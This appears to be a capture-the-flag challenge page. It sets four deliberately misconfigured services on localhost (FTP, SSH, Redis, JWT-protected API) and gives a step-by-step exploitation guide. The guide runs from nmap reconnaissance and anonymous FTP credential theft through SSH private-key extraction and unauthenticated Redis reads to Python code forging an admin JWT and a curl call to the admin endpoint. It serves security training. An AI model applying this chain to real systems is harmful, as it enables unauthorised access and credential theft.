REAL NETWORK CHALLENGE • 300 POINTS

Zero-Trust Service Enumeration

Exploit REAL misconfigured network services running on the target system. Use actual penetration testing tools like nmap, ftp, redis-cli, and curl to discover and exploit vulnerabilities across four different services.

Target Information

Target IP Address: localhost
FTP Service: Port 2121 (anonymous login)
SSH Service: Port 2222 (key authentication)
Redis Database: Port 6379 (no authentication)
API Gateway: Port 8080 (JWT authentication)
Service Dashboard
FTP Service
Port 2121 • Anonymous Login Enabled
● Online
SSH Service
Port 2222 • Key Authentication
● Online
Redis Database
Port 6379 • No Authentication
● Online
API Gateway
Port 8080 • JWT Authentication
● Online

Flag Submission

Submit flags discovered through REAL exploitation. Each service contains one flag. Expected format: FLAG{service-name-description}

Exploitation Progress 0%
Flags Captured: 0/4 Points: 0/300

Exploitation Guide

Step 1: Reconnaissance

nmap -sV -p 2121,2222,6379,8080 localhost

Discover open ports and service versions.

Step 2: FTP Service Exploitation

ftp localhost 2121
Username: anonymous
Password: [press Enter]
ls -la
get .hidden_creds.txt

Use anonymous login to access FTP server and download hidden credentials.

Step 3: SSH Access

# Extract SSH key from downloaded file
cat .hidden_creds.txt | grep -A 100 "Private Key" | tail -n +2 | head -n -4 > ssh_key.b64
base64 -d ssh_key.b64 > ssh_key.pem
chmod 600 ssh_key.pem

# Connect via SSH
ssh -i ssh_key.pem -p 2222 admin_zt@localhost

Extract SSH private key from FTP file and connect to SSH service.

Step 4: Redis Data Extraction

redis-cli -h localhost -p 6379
KEYS *
GET zt:flag:redis
GET zt:api:jwt_secret

Access Redis database without authentication to extract JWT secret and flag.

Step 5: JWT Token Forgery

# Use Python to forge admin JWT token
import jwt
import time

secret = "SuperSecretJWTKeyForZTAPI2026"
payload = {
    "user": "admin_007",
    "role": "admin",  # Changed from "user"
    "iat": int(time.time())
}
token = jwt.encode(payload, secret, algorithm="HS256")
print(f"Token: {token}")

Use extracted JWT secret to forge admin authentication token.

Step 6: Admin API Access

curl -H "Authorization: Bearer [FORGED_TOKEN]" \
http://localhost:8080/api/v1/admin/flag

Use forged token to access admin endpoint and retrieve final flag.

Challenge Objectives

  • Capture all 4 flags (one from each service)
  • Demonstrate actual network exploitation skills
  • Chain vulnerabilities between services
  • Submit flags via this interface
  • Complete challenge with 100% progress